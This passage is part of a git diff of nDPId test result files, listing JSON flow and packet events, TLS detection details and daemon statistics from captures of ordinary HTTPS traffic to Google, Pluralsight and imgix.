+00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1605289714590,"flow_last_seen":1605289716476,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":38980,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289728586,"flow_last_seen":1605289728804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":48890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289728586,"flow_last_seen":1605289728804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":48890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::200a","src_port":57130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::200a","src_port":57130,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289722442,"flow_last_seen":1605289722621,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":46918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00614{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289722442,"flow_last_seen":1605289722621,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":46918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00574{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","packets-captured":17657,"packets-processed":17657,"total-skipped-flows":0,"total-l4-data-len":26490343,"total-not-detected-flows":0,"total-guessed-flows":17,"total-detected-flows":21,"total-detection-updates":31,"total-updates":0,"current-active-flows":0,"total-active-flows":37,"total-idle-flows":37,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":241,"global_ts_msec":1605289734948} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 17657/17657 diff --git a/test/results/pluralsight.pcap.out b/test/results/pluralsight.pcap.out index 0c415f012..92ed5ff92 100644 --- a/test/results/pluralsight.pcap.out +++ b/test/results/pluralsight.pcap.out 
@@ -1,51 +1,51 @@ 00462{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"pluralsight.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"pluralsight.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1648373355763} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373355763,"flow_last_seen":1648373355763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373355763,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1648373355763,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373355763,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8t1dAAEAGzuTAqAGANkW8EqaSAbs5mmmUAAAAAKAC+vDIPgAAAgQFtAQCCAqK+PnbAAAAAAEDAwc="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1648373355952,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373355952,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAAOAG5js2RbwSwKgBgAG7ppJ9QO7SOZpplaASaN998gAAAgQFtAQCCApSMR4Hivj52wEDAwg="} -01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1648373355952,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1648373355952,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5t1lAAEAGzOXAqAGANkW8EqaSAbs5mmmVfUDu04AYAfbrKAAAAQEICor4+pdSMR4HFgMBAgABAAH8AwM1jCFDKADpkwCWNDdgH\/adXVGzDgYuQsQMuim+6yCdjCAuElAWaAcNbYd22pDJpusrU2oMuj5gm\/t2Aky6e512VAAgamoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTSkoAAAAAABQAEgAAD3BsdXJhbHNpZ2h0LmNvbQAXAAD\/AQABAAAKAAoACCoqAB0AFwAYAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAANABIAEAQDCAQEAQUDCAUFAQgGBgEAEgAAADMAKwApKioAAQAAHQAgy0tnman9YKIJBU2tFJ\/X+H4+8C285s8hNvU9rt60YmAALQACAQEAKwAHBgoKAwQDAwAbAAMCAAJEaQAFAAMCaDJqagABAAAVAMgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373355763,"flow_last_seen":1648373355952,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373355952,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373355763,"flow_last_seen":1648373356139,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1648373356139,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -01308{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1648373355763,"flow_last_seen":1648373356139,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6107,"flow_avg_l4_payload_len":872,"midstream":0,"thread_ts_msec":1648373356139,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.com","server_names":"*.pluralsight.com,pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.pluralsight.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"31:0B:3D:03:7A:6A:F8:86:8F:CE:62:30:E9:A2:F1:47:E5:6C:3D:F7"}} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373357854,"flow_last_seen":1648373357854,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373357854,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1648373357854,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373357854,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8tRVAAEAG8mLAqAGAkks+0KceAbt\/83TdAAAAAKAC+vCjygAAAgQFtAQCCAquLcooAAAAAAEDAwc="} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373357861,"flow_last_seen":1648373357861,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373357861,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1648373357861,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373357861,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA85z1AAEAGwDrAqAGAkks+0KcmAbuYBq2TAAAAAKAC+vBS8wAAAgQFtAQCCAquLcouAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1648373357870,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373357870,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGrniSSz7QwKgBgAG7px6MpPZof\/N03qAS\/\/\/QggAAAgQFTAQCCApC6QiXri3KKAEDAwk="} -01170{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1648373357870,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1648373357870,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5tRdAAEAG8GPAqAGAkks+0KceAbt\/83TejKT2aYAYAfY+HwAAAQEICq4tyjdC6QiXFgMBAgABAAH8AwNByQDZoxI4dOK0Sqz8YqFtpt\/EgjJNogy+qC4qHtET5yBBjqjV\/zD\/ZZYcaXw3kK2L11Av5ASkLtB9CBYWZu3HRgAg2toTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTGhoAAAAAABsAGQAAFnBsdXJhbHNpZ2h0Mi5pbWdpeC5uZXQAFwAA\/wEAAQAACgAKAAh6egAdABcAGAALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAADQASABAEAwgEBAEFAwgFBQEIBgYBABIAAAAzACsAKXp6AAEAAB0AICyryrnXcbLoAjfLxc89+emszCPBlJNQz9WtPrwFSKZoAC0AAgEBACsABwZ6egMEAwMAGwADAgACRGkABQADAmgySkoAAQAAFQDBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373357854,"flow_last_seen":1648373357870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373357870,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight2.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1648373357879,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373357879,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGrniSSz7QwKgBgAG7pyYtR\/VLmAatlKAS\/\/8fEgAAAgQFTAQCCAr1hBcPri3KLgEDAwk="} 
-01167{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1648373357879,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1648373357879,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI55z9AAEAGvjvAqAGAkks+0KcmAbuYBq2ULUf1TIAYAfb0QgAAAQEICq4tykD1hBcPFgMBAgABAAH8AwMVCkjcl1ldHYszMMhbvCrBmyAv89Ky2j4DTP7XcUyMOSBZfmcNBQmySrBYu\/Xc6jDaJEswZCfnt+SXnGDnGRc5VwAgCgoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTSkoAAAAAABoAGAAAFXBsdXJhbHNpZ2h0LmltZ2l4Lm5ldAAXAAD\/AQABAAAKAAoACBoaAB0AFwAYAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAANABIAEAQDCAQEAQUDCAUFAQgGBgEAEgAAADMAKwApGhoAAQAAHQAgibFRT+4ffFiWVzdt9+CHYgJvYueRYWReY4H44PP66lMALQACAQEAKwAHBurqAwQDAwAbAAMCAAJEaQAFAAMCaDJaWgABAAAVAMIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373357861,"flow_last_seen":1648373357879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373357879,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pluralsight.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -00969{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373357854,"flow_last_seen":1648373357887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1648373357887,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight2.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -01212{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1648373357854,"flow_last_seen":1648373357887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4537,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1648373357887,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pluralsight2.imgix.net","server_names":"*.imgix.com,*.imgix.net,imgix.com,imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 2020","subjectDN":"CN=*.imgix.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"C6:A8:D1:F3:16:08:C6:7F:9F:58:B9:3B:87:A6:A1:75:BC:67:F8:8D"}} -00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373357861,"flow_last_seen":1648373357901,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1648373357901,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} 
-01211{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1648373357861,"flow_last_seen":1648373357901,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4537,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1648373357901,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.imgix.net","server_names":"*.imgix.com,*.imgix.net,imgix.com,imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 2020","subjectDN":"CN=*.imgix.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"C6:A8:D1:F3:16:08:C6:7F:9F:58:B9:3B:87:A6:A1:75:BC:67:F8:8D"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373358908,"flow_last_seen":1648373358908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373358908,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
